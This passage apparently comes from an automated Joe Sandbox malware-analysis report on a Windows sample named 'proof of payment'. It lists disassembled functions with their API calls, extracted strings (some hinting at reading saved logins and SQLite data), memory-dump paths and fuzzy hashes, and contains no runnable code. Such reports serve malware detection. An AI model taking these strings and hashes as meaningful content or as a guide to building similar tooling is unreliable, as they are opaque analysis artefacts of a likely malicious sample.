                                      • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                      • String ID:
                                      • API String ID: 3467550082-0
                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                      • API String ID: 3510742995-3273207271
                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                      • memset.MSVCRT ref: 00413ADC
                                      • memset.MSVCRT ref: 00413AEC
                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                      • memset.MSVCRT ref: 00413BD7
                                      • wcscpy.MSVCRT ref: 00413BF8
                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                      • String ID: 3A
                                      • API String ID: 3300951397-293699754
                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                      • wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                      • wcslen.MSVCRT ref: 0040D1D3
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                      • memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                      • String ID: strings
                                      • API String ID: 3166385802-3030018805
                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00411AF6
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 00411B14
                                      • wcscat.MSVCRT ref: 00411B2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                      • String ID: AE$.cfg$General$EA
                                      • API String ID: 776488737-1622828088
                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040D8BD
                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                      • memset.MSVCRT ref: 0040D906
                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                      • String ID: sysdatetimepick32
                                      • API String ID: 1028950076-4169760276
                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: -journal$-wal
                                      • API String ID: 438689982-2894717839
                                      • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                      • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Item$Dialog$MessageSend
                                      • String ID:
                                      • API String ID: 3975816621-0
                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 00444D09
                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                      • _wcsicmp.MSVCRT ref: 00444D33
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$wcslen$_memicmp
                                      • String ID: .save$http://$https://$log profile$signIn
                                      • API String ID: 1214746602-2708368587
                                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                      • String ID:
                                      • API String ID: 2313361498-0
                                      • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                      • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                      • String ID:
                                      • API String ID: 4218492932-0
                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                      • memcpy.MSVCRT ref: 0044A8BF
                                      • memcpy.MSVCRT ref: 0044A90C
                                      • memcpy.MSVCRT ref: 0044A988
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                      • memcpy.MSVCRT ref: 0044A9D8
                                      • memcpy.MSVCRT ref: 0044AA19
                                      • memcpy.MSVCRT ref: 0044AA4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: gj
                                      • API String ID: 438689982-4203073231
                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                      • API String ID: 3510742995-2446657581
                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                      • memset.MSVCRT ref: 00405ABB
                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                      • SetFocus.USER32(?), ref: 00405B76
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSend$FocusItemmemset
                                      • String ID:
                                      • API String ID: 4281309102-0
                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscat
                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                      • API String ID: 384018552-4153097237
                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                      • String ID: 0$6
                                      • API String ID: 2029023288-3849865405
                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                      • memset.MSVCRT ref: 00405455
                                      • memset.MSVCRT ref: 0040546C
                                      • memset.MSVCRT ref: 00405483
                                      • memcpy.MSVCRT ref: 00405498
                                      • memcpy.MSVCRT ref: 004054AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$memcpy$ErrorLast
                                      • String ID: 6$\
                                      • API String ID: 404372293-1284684873
                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                      • wcscpy.MSVCRT ref: 0040A0D9
                                      • wcscat.MSVCRT ref: 0040A0E6
                                      • wcscat.MSVCRT ref: 0040A0F5
                                      • wcscpy.MSVCRT ref: 0040A107
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                      • String ID:
                                      • API String ID: 1331804452-0
                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: advapi32.dll
                                      • API String ID: 2012295524-4050573280
                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • <%s>, xrefs: 004100A6
                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                      • API String ID: 3473751417-2880344631
                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscat$_snwprintfmemset
                                      • String ID: %2.2X
                                      • API String ID: 2521778956-791839006
                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscpy
                                      • String ID: dialog_%d$general$menu_%d$strings
                                      • API String ID: 999028693-502967061
                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

